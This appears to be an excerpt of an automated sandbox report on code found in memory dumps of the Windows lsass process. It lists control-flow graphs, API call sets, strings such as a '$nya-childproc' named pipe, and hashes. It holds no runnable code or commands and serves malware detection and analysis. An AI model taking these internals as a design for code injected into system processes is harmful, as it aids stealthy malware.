                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: FF317C32A08F4897E721DF52B804799A3B4BB98B95F484525DE8D43626DF78C4D78780

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: b2a5967eee084143195432e5f40e43866f6486d5eaa342772f780f2da15f402f
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: D0318C31618F498BEB10DF22B884799B3B0BF84F95F4851259E8E43766EE78D4C38680

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 359 17d2dd5a22c-17d2dd5a294 call 17d2dd5b144 362 17d2dd5a29a-17d2dd5a29d 359->362 363 17d2dd5a6f5-17d2dd5a6fb call 17d2dd5c388 359->363 362->363 364 17d2dd5a2a3-17d2dd5a2a9 362->364 366 17d2dd5a2af-17d2dd5a2b3 364->366 367 17d2dd5a378-17d2dd5a38a 364->367 366->367 371 17d2dd5a2b9-17d2dd5a2c4 366->371 369 17d2dd5a390-17d2dd5a394 367->369 370 17d2dd5a645-17d2dd5a649 367->370 369->370 372 17d2dd5a39a-17d2dd5a3a5 369->372 374 17d2dd5a682-17d2dd5a68c call 17d2dd59324 370->374 375 17d2dd5a64b-17d2dd5a652 370->375 371->367 373 17d2dd5a2ca-17d2dd5a2cf 371->373 372->370 376 17d2dd5a3ab-17d2dd5a3af 372->376 373->367 377 17d2dd5a2d5-17d2dd5a2df call 17d2dd59324 373->377 374->363 385 17d2dd5a68e-17d2dd5a6ad call 17d2dd58070 374->385 375->363 378 17d2dd5a658-17d2dd5a67d call 17d2dd5a6fc 375->378 381 17d2dd5a575-17d2dd5a581 376->381 382 17d2dd5a3b5-17d2dd5a3f0 call 17d2dd59704 376->382 377->385 393 17d2dd5a2e5-17d2dd5a310 call 17d2dd59324 * 2 call 17d2dd59a0c 377->393 378->374 381->374 386 17d2dd5a587-17d2dd5a58b 381->386 382->381 397 17d2dd5a3f6-17d2dd5a3ff 382->397 390 17d2dd5a58d-17d2dd5a599 call 17d2dd599cc 386->390 391 17d2dd5a59b-17d2dd5a5a3 386->391 390->391 403 17d2dd5a5bc-17d2dd5a5c4 390->403 391->374 396 17d2dd5a5a9-17d2dd5a5b6 call 17d2dd595a4 391->396 426 17d2dd5a312-17d2dd5a316 393->426 427 17d2dd5a330-17d2dd5a33a call 17d2dd59324 393->427 396->374 396->403 401 17d2dd5a403-17d2dd5a435 397->401 405 17d2dd5a43b-17d2dd5a447 401->405 406 17d2dd5a568-17d2dd5a56f 401->406 408 17d2dd5a5ca-17d2dd5a5ce 403->408 409 17d2dd5a6d8-17d2dd5a6f4 call 17d2dd59324 * 2 call 17d2dd5c2f4 403->409 405->406 410 17d2dd5a44d-17d2dd5a46c 405->410 406->381 406->401 412 17d2dd5a5e1 408->412 413 17d2dd5a5d0-17d2dd5a5df call 17d2dd599cc 408->413 409->363 414 17d2dd5a472-17d2dd5a4af call 17d2dd599e0 * 2 410->414 415 17d2dd5a558-17d2dd5a55d 410->415 420 17d2dd5a5e3-17d2dd5a5ed call 17d2dd5b1dc 412->420 413->420 439 17d2dd5a4e2-17d2dd5a4e5 414->439 415->406 420->374 437 17d2dd5a5f3-17d2dd5a643 call 17d2dd59634 call 17d2dd59838 420->437 426->427 431 17d2dd5a318-17d2dd5a323 426->431 427->367 442 17d2dd5a33c-17d2dd5a35c call 17d2dd59324 * 2 call 17d2dd5b1dc 427->442 431->427 436 17d2dd5a325-17d2dd5a32a 431->436 436->363 436->427 437->374 445 17d2dd5a4b1-17d2dd5a4d7 call 17d2dd599e0 call 17d2dd5a96c 439->445 446 17d2dd5a4e7-17d2dd5a4ee 439->446 464 17d2dd5a373 442->464 465 17d2dd5a35e-17d2dd5a368 call 17d2dd5b2cc 442->465 460 17d2dd5a4f9-17d2dd5a556 call 17d2dd5a158 445->460 461 17d2dd5a4d9-17d2dd5a4dc 445->461 450 17d2dd5a4f0-17d2dd5a4f4 446->450 451 17d2dd5a55f 446->451 450->414 452 17d2dd5a564 451->452 452->406 460->452 461->439 464->367 469 17d2dd5a6d2-17d2dd5a6d7 call 17d2dd5c2f4 465->469 470 17d2dd5a36e-17d2dd5a6d1 call 17d2dd58f84 call 17d2dd5ad28 call 17d2dd59178 465->470 469->409 470->469
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: a7143d3f81dc630082b136a90ca0f54496fd1e4b9adf58d3744d12870631f34a
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: 59D17C7260CF988AEB20DB65A4403DD77B0FB45788F182115EA8D57B9ADBB4E5C6C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: 310fc0b5922953b9c4234ef9c5d0874e37dd68400065c5e6711a8eed723815eb
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: 03D16832648B888AEB609F65A4883ED77B0FB45798F185215EE8D57B9FDB34C5C2C700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 480 17d2dd5104c-17d2dd510b9 RegQueryInfoKeyW 481 17d2dd510bf-17d2dd510c9 480->481 482 17d2dd511b5-17d2dd511d0 480->482 481->482 483 17d2dd510cf-17d2dd5111f RegEnumValueW 481->483 484 17d2dd511a5-17d2dd511af 483->484 485 17d2dd51125-17d2dd5112a 483->485 484->482 484->483 485->484 486 17d2dd5112c-17d2dd51135 485->486 487 17d2dd51147-17d2dd5114c 486->487 488 17d2dd51137 486->488 489 17d2dd5114e-17d2dd51193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 487->489 490 17d2dd51199-17d2dd511a3 487->490 491 17d2dd5113b-17d2dd5113f 488->491 489->490 490->484 491->484 492 17d2dd51141-17d2dd51145 491->492 492->487 492->491
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: 3cb689649fdd88a86a4149668db6177ce478f31cb262a3dabc8e4b9b4df4e1f0
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 69412D72218F84DAE760CF61F44479A77B1F788B98F488129DB8907759DF78C58ACB80

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 709f8d1fd23cfc63cb23fbc949a151c789b254d588f567ccc9f9cf4f3d996b29
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 50114C3261CB4482F7108B21F41439A7770FB89BD4F984315EB5E02AA9CF7CC18ACB80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 498 17d2dd57c50-17d2dd57c56 499 17d2dd57c91-17d2dd57c9b 498->499 500 17d2dd57c58-17d2dd57c5b 498->500 501 17d2dd57db8-17d2dd57dcd 499->501 502 17d2dd57c5d-17d2dd57c60 500->502 503 17d2dd57c85-17d2dd57cc4 call 17d2dd582f0 500->503 507 17d2dd57dcf 501->507 508 17d2dd57ddc-17d2dd57df6 call 17d2dd58184 501->508 505 17d2dd57c62-17d2dd57c65 502->505 506 17d2dd57c78 __scrt_dllmain_crt_thread_attach 502->506 518 17d2dd57d92 503->518 519 17d2dd57cca-17d2dd57cdf call 17d2dd58184 503->519 510 17d2dd57c71-17d2dd57c76 call 17d2dd58234 505->510 511 17d2dd57c67-17d2dd57c70 505->511 514 17d2dd57c7d-17d2dd57c84 506->514 512 17d2dd57dd1-17d2dd57ddb 507->512 521 17d2dd57e2b-17d2dd57e5c call 17d2dd584b0 508->521 522 17d2dd57df8-17d2dd57e29 call 17d2dd582ac call 17d2dd5814c call 17d2dd58634 call 17d2dd58450 call 17d2dd58474 call 17d2dd582dc 508->522 510->514 523 17d2dd57d94-17d2dd57da9 518->523 531 17d2dd57daa-17d2dd57db7 call 17d2dd584b0 519->531 532 17d2dd57ce5-17d2dd57cf6 call 17d2dd581f4 519->532 533 17d2dd57e5e-17d2dd57e64 521->533 534 17d2dd57e6d-17d2dd57e73 521->534 522->512 531->501 550 17d2dd57cf8-17d2dd57d1c call 17d2dd585f8 call 17d2dd5813c call 17d2dd58168 call 17d2dd5b428 532->550 551 17d2dd57d47-17d2dd57d51 call 17d2dd58450 532->551 533->534 540 17d2dd57e66-17d2dd57e68 533->540 535 17d2dd57eb5-17d2dd57ecb call 17d2dd53a1c 534->535 536 17d2dd57e75-17d2dd57e7f 534->536 559 17d2dd57f03-17d2dd57f05 535->559 560 17d2dd57ecd-17d2dd57ecf 535->560 542 17d2dd57e81-17d2dd57e84 536->542 543 17d2dd57e86-17d2dd57e8c 536->543 541 17d2dd57f52-17d2dd57f5f 540->541 548 17d2dd57e8e-17d2dd57e94 542->548 543->548 555 17d2dd57e9a-17d2dd57eaf call 17d2dd57c50 548->555 556 17d2dd57f48-17d2dd57f50 548->556 550->551 600 17d2dd57d1e-17d2dd57d25 __scrt_dllmain_after_initialize_c 550->600 551->518 572 17d2dd57d53-17d2dd57d5f call 17d2dd584a0 551->572 555->535 555->556 556->541 563 17d2dd57f0c-17d2dd57f21 call 17d2dd57c50 559->563 564 17d2dd57f07-17d2dd57f0a 559->564 560->559 568 17d2dd57ed1-17d2dd57ef3 call 17d2dd53a1c call 17d2dd57db8 560->568 563->556 582 17d2dd57f23-17d2dd57f2d 563->582 564->556 564->563 568->559 593 17d2dd57ef5-17d2dd57efa 568->593 590 17d2dd57d61-17d2dd57d6b call 17d2dd583b8 572->590 591 17d2dd57d85-17d2dd57d90 572->591 588 17d2dd57f34-17d2dd57f42 582->588 589 17d2dd57f2f-17d2dd57f32 582->589 594 17d2dd57f44 588->594 589->594 590->591 599 17d2dd57d6d-17d2dd57d7b 590->599 591->523 593->559 594->556 599->591 600->551 601 17d2dd57d27-17d2dd57d44 call 17d2dd5b3f0 600->601 601->551
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 4c8f37232e856023605888e2b1735ea5b4ca42d108cd0c214cd9eba3c911007f
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 4F81C23070CF4D96FA60EB65B8413E966B1AF85B84F6C4015AA0D47397DBB8C8CB8740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: e277e449b48480b4843398206f7a681ef9f1fae92a2cb6f22c3226b47e71a24d
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: A381A03060DF4DA6FAB59B65B84A3D962B1AF86780F5C50159D0C4779FDA38C9CB8B00
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B31
                                                  • GetLastError.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B69
                                                  • FreeLibrary.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: f48c940c265e2daad92e5c1e5b6921450fbf53ad875bcdb193b5a88706f70175
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 6A31AE3121AF4891FF119B16B8807E523B4BF58BA0F9D0625ED1D4B796EF78E4C68390
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 57ad0a87101fc014a47693d5d53f1c791703df7ebf8c7a55728d0379093e6ab6
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 1C116031718F4486E7608B56F854759B7B4FB88BE4F584224EA5E87B99CF3CC48687C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 8cf41acd218546793b6ed0d90e458c47a19c5a17e27bbef3670ec55f879e2049
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: 3CD17B76209F8C85EA70DB1AF49439A77B0F788B88F540156EA8D477A6DF7CC592CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: b487a383841d198bad61ad671097e45e90b99253259c84bcebb8eb2ffb1bb39e
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: EB51AF35209F4995FB06DF68FC913D823B1BF04744F885915A92D067AAEFB8D5ABC380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: e44f6ab9cc7e4a7ef97263a8d5e3176e6a8d105c8800c8036b3f4b44f3aa658b
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 8D316B32709F5987EA15DF16B9446A9A3B0BF54B84F0C4428DF8C47B56EF78C4E28740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: d555153932640f8d0347a3364c120d1ec568d657c151868c23cbfcce845ca8fc
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: B2113D31218B4842FA14673578117EA2271AF857A1F9C4624E96E967CBDEB8C4C34641
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 5d1b500fe26d28fa52f1e2ea028b920d62cefd2ec870b9f025740f9f7ca69692
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 36010535708B8886EB24DB12B85839962B1FB88FC0F8840359E9D43759DE79C9CAC7C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
